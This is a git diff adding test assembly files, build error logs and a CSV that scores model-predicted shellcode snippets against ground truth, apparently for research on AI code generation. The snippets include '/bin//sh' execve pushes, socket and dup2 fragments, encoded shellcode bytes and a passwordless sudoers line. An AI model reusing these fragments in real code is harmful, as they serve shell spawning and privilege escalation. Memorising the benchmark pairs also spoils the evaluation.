a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_66.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_66.asm new file mode 100644 index 0000000000000000000000000000000000000000..010772365b2d351f15d4ef18675b5769a6e12073 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_66.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + pop ebx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_66.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_66.obj new file mode 100644 index 0000000000000000000000000000000000000000..85277c181c186187943bbdeec91895889af1ecd2 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_66.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_7.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_7.asm new file mode 100644 index 0000000000000000000000000000000000000000..39c4358beb7482deedb8db7aec7c2720edd68176 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_7.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor eax, eax + mul eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_7.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_7.obj new file mode 100644 index 0000000000000000000000000000000000000000..0870fa360200e4c04f63a847563af1d0008756c2 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_7.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_70.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_70.asm new file mode 100644 index 0000000000000000000000000000000000000000..60e2457f204aec110cf3726b0cf7bf999d831b99 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_70.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + _zero1a: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_70.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_70.obj new file mode 100644 index 0000000000000000000000000000000000000000..6c74187a4b42b72287bf24c944a47f6bf772dc8e Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_70.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_71.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_71.asm new file mode 100644 index 0000000000000000000000000000000000000000..10ad3ce36987fddd4b819016854982b8506cc945 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_71.asm @@ -0,0 +1,15 @@ +section .data + +loop equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp edx, 0x43 + jge loop + push edx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_73.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_73.asm new file mode 100644 index 0000000000000000000000000000000000000000..1c0a923bc76f2ab11e53ab9f94fe5fec0d33e2fb --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_73.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + section + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_73.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_73.obj new file mode 100644 index 0000000000000000000000000000000000000000..282fcbf818a70e080ce52bc738ab1817216f5fa9 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_73.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_75.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_75.asm new file mode 100644 index 0000000000000000000000000000000000000000..3ab6d38d6df0efe54a03cd7037332ec5210cf845 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_75.asm @@ -0,0 +1,15 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push word 0x68732f2f + push word 0x6e69622f + push word 0x69622f + push word 0x69622f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_75.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_75.obj new file mode 100644 index 0000000000000000000000000000000000000000..c60f6ce1c7dfe4c98382a6a225c922323e0a23a7 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_75.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_78.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_78.asm new file mode 100644 index 0000000000000000000000000000000000000000..749fbdb4212274ac79a6ecc25214964b088fd010 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_78.asm @@ -0,0 +1,13 @@ +section .data + +sys_socket equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov bl, sys_socket + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_78.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_78.obj new file mode 100644 index 0000000000000000000000000000000000000000..39ddc4d5bdc510d96eea88e14d95e77edea22bd9 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_78.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_8.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_8.asm new file mode 100644 index 0000000000000000000000000000000000000000..c222e4b17cfeca8de929c2fdf28d377c5ab33612 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_8.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + sub al, bl + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_8.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_8.obj new file mode 100644 index 0000000000000000000000000000000000000000..cf18ec601f8c63a8bdef32c64c8c06062e9cc356 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_8.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_81.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_81.asm new file mode 100644 index 0000000000000000000000000000000000000000..e2af7a26316f0715b5d0f111e8ce4e6367c47c6c --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_81.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor [esi], dl + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_81.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_81.obj new file mode 100644 index 0000000000000000000000000000000000000000..32622a6b0d88fc0e6bda6f46311e6909630793c3 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_81.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_82.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_82.asm new file mode 100644 index 0000000000000000000000000000000000000000..a5d189ce7a1e747045232bc8e76b860cc846063f --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_82.asm @@ -0,0 +1,14 @@ +section .data + +_encodedshellcode equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp cl, dl + je _encodedshellcode + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_82.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_82.obj new file mode 100644 index 0000000000000000000000000000000000000000..cc8aea5564880ba4dc5a22e2cda295cb826a65da Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_82.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_84.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_84.asm new file mode 100644 index 0000000000000000000000000000000000000000..4db35e9a0f87c2e904b70b60b10b2c74ff60e55a --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_84.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov ecx, esp + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_84.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_84.obj new file mode 100644 index 0000000000000000000000000000000000000000..2e121d2a53b689c8f61e1e0923dcbb7dafb2ed6a Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_84.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_85.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_85.asm new file mode 100644 index 0000000000000000000000000000000000000000..39c4358beb7482deedb8db7aec7c2720edd68176 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_85.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor eax, eax + mul eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_85.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_85.obj new file mode 100644 index 0000000000000000000000000000000000000000..b60aea5a6bc2f1bae012ed58fd30692c3ea57d68 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_85.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_89.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_89.asm new file mode 100644 index 0000000000000000000000000000000000000000..a0a1ebc861005a3072f98e8aec04431d852d3f8f --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_89.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + sub eax, esp + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_89.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_89.obj new file mode 100644 index 0000000000000000000000000000000000000000..146bbc72f14f38618fe774ac1f72542e7e3849cc Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_89.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_9.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_9.asm new file mode 100644 index 0000000000000000000000000000000000000000..03313c95fad31286aba34b30e76b830054542239 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_9.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov al, 0x68732f2f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_9.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_9.obj new file mode 100644 index 0000000000000000000000000000000000000000..f261f6ae5c6db763c44f90b7be728dd4bdd71373 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_9.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_92.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_92.asm new file mode 100644 index 0000000000000000000000000000000000000000..64492cfb40f283a0a9ca6cbc781e3bf621ad7a6c --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_92.asm @@ -0,0 +1,14 @@ +section .data + +_dup2 equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp cl, 0xff, + jne _dup2 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_92.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_92.obj new file mode 100644 index 0000000000000000000000000000000000000000..5266a61da4fb4be8a4faf0b49767f0cb5c3f3bad Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_92.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_97.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_97.asm new file mode 100644 index 0000000000000000000000000000000000000000..dc01f6d3617f3a7f8f86df55dd95e2237f306a71 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_97.asm @@ -0,0 +1,11 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_97.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_97.obj new file mode 100644 index 0000000000000000000000000000000000000000..24071e3e2a5ba159cd278fe19fc9bbf76f3cc864 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_97.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/debugObj.txt b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/debugObj.txt new file mode 100644 index 0000000000000000000000000000000000000000..79c08bf5ff3875bdf7796c118a98ccda313e6f44 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/debugObj.txt @@ -0,0 +1,6 @@ +ld: warning: -m is obsolete +ld: warning: option -m is obsolete and being ignored +ld: file not found: i386pe +ld: warning: -m is obsolete +ld: warning: option -m is obsolete and being ignored +ld: file not found: i386pe diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/tempFile.txt b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/tempFile.txt new file mode 100644 index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/tempFile1.txt b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/tempFile1.txt new file mode 100644 index 0000000000000000000000000000000000000000..83e9a183f6f048c4fa06c6ddfd7d1cd193ef3f9a --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/tempFile1.txt @@ -0,0 +1,8 @@ +GT_71.asm:3: error: comma, colon, decorator or end of line expected after operand +PR_71.asm:3: error: comma, colon, decorator or end of line expected after operand +GT_144.asm:13: error: symbol `do_inject' not defined +PR_144.asm:13: error: symbol `while' not defined +PR_185.asm:12: error: symbol `for' not defined +GT_297.asm:13: error: symbol `xordecode' not defined +PR_297.asm:13: error: symbol `xordecode' not defined +GT_377.asm:13: error: symbol `l3' not defined diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/output_semantic_equivalence_assembly_test_output.csv b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/output_semantic_equivalence_assembly_test_output.csv new file mode 100644 index 0000000000000000000000000000000000000000..ed94ec27451d1a7595e042aa5a5fed2bb901a719 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/output_semantic_equivalence_assembly_test_output.csv @@ -0,0 +1,592 @@ +Ground Truth Snippets;Predicted Snippets;Score Semantic Equivalence +mov ax, [esi];mov ax, [esi];1 +cmp ecx, 0h;cmp ecx, 0h;1 +push 0x6d6f632e \\n push 0x656c676f \\n push 0x6f672031 \\n push 0x2e312e31 \\n push 0x2e373231;push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f;GT: errorGenEXE +sub ecx, 0x1525152a;sub ecx, 0x1525152a;1 +inc cx;inc cx;1 +sys_execve equ 0x0b;0x0b equ 0x0b;0 +xor eax, eax \\n xor ebx, ebx;xor eax, eax \\n mul eax;GT: errorGenEXE +sub bl, al;sub al, bl;GT: errorGenEXE +int 0x80;mov al, 0x68732f2f \\n int 0x6e69622f;GT: errorGenEXE +sub bl, 3;sub bl, 3;1 +pop esi;mov esi, esp;GT: errorGenEXE +push 0x69622f2f;push 0x69622f2f;1 +section .bss;section .;GT: errorGenEXE +xor esi, esi;xor esi, esi;1 +mov eax, [y];mov eax, y;GT: errorGenEXE +push edi;push edi;1 +cmp dword [eax], ebx;cmp dword [eax], ebx;1 +get:;get_label:;GT: errorGenEXE +call_decoder:;call_decoder:;1 +decrypt:;decrypt:;1 +loop main_push;loop main_push;1 +push eax;push eax;1 +zerod:;_zerod:;GT: errorGenEXE +mov eax, esp;mov eax, esp;1 +mov al, [byte_tbl+2];mov al, byte_tbl+2;GT: errorGenEXE +mov esi, esp;mov esi, esp;1 +mov ebx, [y];mov ebx, y;GT: errorGenEXE +duploop:;duploop_label:;GT: errorGenEXE +chmod_call equ 15;=15:;0 +shl ebx, 8;shl ebx, 8;1 +xor ebx, ebx;ebx:;0 +push byte 0x02;push byte 0x02;1 +shr dl, 4;shr dl, 4;1 +push byte my_label \\n pop eax;push byte my_label \\n pop eax;1 +push dword 0x74652f2f \\n mov ebx, esp;push dword 0x74652f2f \\n mov ebx, esp;1 +inc esi \\n inc esi;inc esi \\n inc esi \\n inc esi \\n inc esi;GT: errorGenEXE +xor edx, edx \\n xor esi, esi;xor edx, edx \\n xor esi, esi;1 +xor ah, ah;xor ah, ah;1 +jmp loop;jmp loop;1 +int 80h;int 0x80;GT: errorGenEXE +F2: \\n not bl \\n inc bl;bl: not bl \\n inc bl \\n inc bl;0 +mov [edi], al;mov al, edi;0 +push ecx;push ecx;1 +push edx;push edx \\n push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x;GT: errorGenEXE +encodedshellcode: db 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94,0x9f,0x9f,0xd8,0xa5,0x9e,0x99,0x7e,0x24,0xb7,0x7e,0x25,0xb4,0x7e,0x26,0x57,0xfc,0x3a,0x87;encodedshellcode: db 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94,0x9f,0x9f,0xd8,0xa5,0x9e,0x99,0x7e,0x24,0xb7,0x7e,0x25,0xb4,0x7e,0x26,0x57,0xfc,0x3a,0x87;1 +next_addr:;_next_addr:;GT: errorGenEXE +push word 100;push word 100;1 +mov esi, eax;mov esi, eax;1 +push 0x68732f6e \\n push 0x69622f2f \\n mov ebx, esp;push bin/sh \\n push ebx;0 +push eax \\n push edx;push eax \\n push edx;1 +inc ax;add ax, 1;GT: errorGenEXE +push 0x65782e2f \\n push 0x706d742f;push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f;GT: errorGenEXE +push word 0x462d;push word 0x462d;1 +mov ecx, esp;mov ecx, esp;1 +lea ecx, [eax];push [\\n pop eax \\n pop ecx;0 +sub eax, eax;xor eax, eax;GT: errorGenEXE +xor eax, esi;xor eax, esi;1 +jns loopinghere;jns loopinghere;1 +inc edx;inc edx;1 +mov bl,0x4;mov bl, 0x4;1 +duploop:;duploop:;1 +pop esi;pop esi;1 +push word 0x0a;push af_inet6;GT: errorGenEXE +db 'all all=(all) nopasswd: all', 0xa;db 'all all=(all) nopasswd: all';GT: errorGenEXE +jmp short path;jmp short path;1 +mov[esi+39], ebx;pop ebx;GT: errorGenEXE +div ebx;div ebx;1 +push ecx;push ecx;1 +add edi, edi;add edi, edi;1 +zero1a:;_zero1a:;GT: errorGenEXE +cmp edx, 0x43 \\n ja loop \\n push edx;cmp edx, 0x43 \\n jge loop \\n push edx;GT: errorGenEXE +add byte [esi], 0x10;add byte [esi], 0x10;1 +section .text;section;GT: errorGenEXE +mov ecx, m_src3;mov ecx, m_src3;1 +push word 0x3582;push word 0x68732f2f \\n push word 0x6e69622f \\n push word 0x69622f \\n push word 0x69622f;GT: errorGenEXE +mov byte [esi+14],al;mov byte [esi+14], al;1 +next_addr:;next_addr:;1 +mov bl, 0x01;mov bl, sys_socket;GT: errorGenEXE +pop esi;pop esi;1 +dec ecx \\n jns loop;dec ecx \\n jns loop;1 +xor byte [esi+1], dl;xor [esi], dl;GT: errorGenEXE +cmp cl, dl \\n je encodedshellcode;cmp cl, dl \\n je _encodedshellcode;GT: errorGenEXE +encoded_shellcode: db 0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73, 0x2f, 0x68, 0x69, 0x62, 0x87, 0x6e, 0xb0, 0xe3, 0xcd, 0x0b, 0x90, 0x80;0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73, 0x2f, 0x68, 0x69, 0x62, 0x87, 0x6e, 0xb0, 0xe3, 0xcd, 0x0b, 0x90, 0x80 db 0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73, 0x2f, 0x68, 0x69, 0x62, 0x87, 0x6e, 0xb0, 0xe3, 0xcd, 0x0b, 0x90, 0x80;0 +lea ecx, [esp];mov ecx, esp;GT: errorGenEXE +xor eax,eax \\n xor ebx,ebx;xor eax, eax \\n mul eax;GT: errorGenEXE +mov edx, 2;mov edx, 2;1 +mov esi, esp;mov esi, esp;1 +mov ebx, esp;mov ebx, esp;1 +sub eax, [esp];sub eax, esp;GT: errorGenEXE +mov cx, 0x301;mov cx, 0x301;1 +hello: db 'hello world!',10;push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov linefeed, esp;0 +cmp cl, 0xff \\n jne dup2;cmp cl, 0xff, \\n jne _dup2;GT: errorGenEXE +inc esi \\n inc esi;inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc;0 +lea ebx, [edx+0x4];lea ebx, [edx+0x4];1 +shr dl, 4;shr dl, 4;1 +xor eax, 0x6e696230;xor eax, 0x6e696230;1 +call [esp];int 0x80;GT: errorGenEXE +mov edi, 0xaaaa9090;mov edi, 0xaaaa9090;1 +jb next;inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0;0 +filecontents: resb 128;push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov filecontents, esp;0 +mov al, 23;mov al, 23;1 +mov edx, eax;xchg edx, eax;GT: errorGenEXE +cmp al, cl \\n jne short decode \\n jmp shellcode;cmp al, cl \\n jne short decode \\n jmp shellcode;1 +push dword eax;push dword eax;1 +mov bl, 5;push 0x68732f2f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov bl, esp;0 +pop ecx;pop we;0 +push eax \\n push edx \\n push ecx \\n push ebx \\n mov edi, esp;push eax \\n push edx \\n push ecx \\n push ebx \\n mov edi, esp;1 +mov ecx, esp;mov ecx, esp;1 +call write;jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero6e69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f;GT: errorGenEXE +push 10 \\n mov eax, esp;push 10 \\n mov eax, esp;1 +xchg ebx, eax;xchg eax, ebx;GT: errorGenEXE +mov ecx, esp;mov ecx, [args];GT: errorGenEXE +mov ecx, esp;mov ecx, esp;1 +mov esi, esp;mov esi, esp;1 +lea ecx, [esp];mov ebx, esp;GT: errorGenEXE +lea edi, [ebx];lea edi, [ebx];1 +xor dl, 0xbb;xor dl, 0xbb;1 +mov cl, len;mov cl, 0x68732f2f \\n add cl, 0x68732f \\n add cl, 0x6e69622f \\n add cl, 0x69622f \\n add cl, 0x69622f \\n add cl, 0x69622f \\n add cl, 0x69622f \\n add cl, 0x6e69622f \\n add cl, 0x6e69622f \\n add cl, 0x69622f2f \\n add cl, 0x6;GT: errorGenEXE +mov cl, 0x2;mov cl, 0x2;1 +mov eax, msg3;mov eax, msg3;1 +push 0x78;push 0x78;1 +mov al, 11 \\n int 0x80;int 0x80;GT: errorGenEXE +sub bx, dx;sub bx, dx;1 +push 0x61702f2f \\n push 0x6374652f \\n mov eax, esp;push 0x61702f2f \\n push 0x6374652f \\n mov eax, esp;1 +mov edi, hexstr;mov edi, hexstr;1 +jmp edi;jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero6e69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f;GT: errorGenEXE +variablename3: resd 1;push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n;0 +jae _start-0x24;jns _start-0x24;GT: errorGenEXE +push 0x2;push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f;GT: errorGenEXE +push eax \\n push 0x68732f2f \\n push 0x6e69622f \\n push ebx, esp \\n mov edx, eax \\n mov al, 0xb \\n int 0x80;push temrinated \\n push '/bin//sh' \\n push ebx \\n push edx \\n push temrinated \\n push '/bin//sh' \\n push ebx \\n mov edx, 